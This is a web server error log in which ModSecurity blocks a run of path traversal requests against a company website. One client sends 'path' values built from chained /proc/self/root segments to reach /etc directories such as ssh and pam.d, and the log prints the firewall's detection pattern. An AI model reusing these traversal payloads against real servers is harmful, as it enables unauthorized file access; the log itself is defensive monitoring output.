[Wed Mar 18 08:42:19.936482 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:34554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPm9a6ubjKNq_cu4aC3gAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:21.262369 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:34556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPnda6ubjKNq_cu4aC4AAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:22.625681 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:34572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPnta6ubjKNq_cu4aC4QAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:23.890865 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:34574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPn0zinOy1jxa1j4f-cAAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:25.271083 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:34584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPoQkwaGbbGflqUZD7iAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:26.663500 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:34590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPoimAPhZkrhU8w4lYCAAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:29.011763 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:34604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPpew_le52K8_3pV3LCgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:31.375410 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:41316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPpwkwaGbbGflqUZD7kAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:36.075406 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:41330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPrNa6ubjKNq_cu4aC6AAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:40.143041 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:41338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPsEzinOy1jxa1j4f-gQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:41.527047 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:36866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPsdY0UrI5A3LftIyLkgAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:44.204326 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:36878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPsgkwaGbbGflqUZD7lAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:45.961670 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:36882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPtda6ubjKNq_cu4aC7AAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:48.161200 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:36882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPuNa6ubjKNq_cu4aC8AAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:49.674906 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:54566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPufu8EFLIOrSqIpvv8AAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:51.023574 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:54570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPu-w_le52K8_3pV3LIQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:52.351307 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:54582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPvOyqAr6etmhZHNqoxgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:53.720513 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:54598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPveoXxyEfFpUF8f9ZawAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:55.075259 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:54612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPv9a6ubjKNq_cu4aDFQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:58.435161 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:54628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPwtY0UrI5A3LftIyLogAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:42:59.779605 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:40262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPw-oXxyEfFpUF8f9ZcAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:43:02.968571 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:40266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPxuoXxyEfFpUF8f9ZcwAAAU0"], referer: 